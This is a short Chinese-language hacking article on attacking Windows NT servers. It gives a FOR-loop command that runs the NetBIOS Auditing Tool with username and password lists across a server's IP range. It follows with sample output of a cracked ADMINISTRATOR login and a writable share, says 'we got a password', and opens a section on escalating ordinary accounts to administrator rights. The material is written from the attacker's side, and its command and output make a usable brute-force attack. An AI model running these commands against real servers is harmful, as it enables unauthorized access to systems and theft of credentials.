Windows NT攻击大看台

核心提示： D:FOR /L %i IN(1,1,254)Do nat -u userlist.txt -p passlist.txt [输入服务器IP地址，例如：202.11.22.33] %I >> nat_output.txt[*]---Checking host: 202.11.2

D:FOR /L %i IN(1,1,254)Do nat -u userlist.txt -p passlist.txt [输入服务器IP地址，例如：202.11.22.33] %I >> nat_output.txt　
[*]---Checking host: 202.11.22.33　
[*]---Obtaining list of remote NetBIOS names　
[*]---Attempting to connect with Username : ‘ADMINISTRATOR’ Password: ’ADMINISTRATOR’　
[*]---Attempting to connect with Username : ‘ADMINISTRATOR’ Password: ‘GUEST’　
…　
[*]---CONNECTED:USERNAME:’ADMINISTRATOR’ Password: ’PASSWORD’　
[*]---Attempting to access share :*SMBSERVERTEMP　
[*]---WARNING:Able to access share:* SMBSERVERTEMP　
[*]---Checking write access in:* SMBSERVERTEMP　
[*]---WARNING:Directory is writeable:* SMBSERVERTEMP　
[*]---Attempting to exercises..bug on: *SMBSERVERTEMP　
…　

这样一个密码我们就搞到手了。当然像这样的好工具我们还有许多。均可以实现暴力破解。对于一些职业的黑客或者是一些骨灰级的黑客，他们通常会选用一些商业性的破解工具，这些工具运行速度非常快，且可以分许多线程进行破解和并行grinding session，由于这种工具是需要付费的，所以一般黑客不容易得到。　

权限突破　

权限突破是一种黑客们经常使用到的方法，也是最常见的黑客入侵手段。通常的情况下，当黑客们得到一个NT服务器上的一个正常的普通用户名和有效地密码的时候（此密码不等同于Administrator级别的用户名密码），他们就会利用一些NT本身的漏洞和管理员的疏忽所造成的失误性漏洞，对其掌握的帐号进行权限突破，也就是所谓的将自己的普通权限帐号升级为特殊权限的帐号。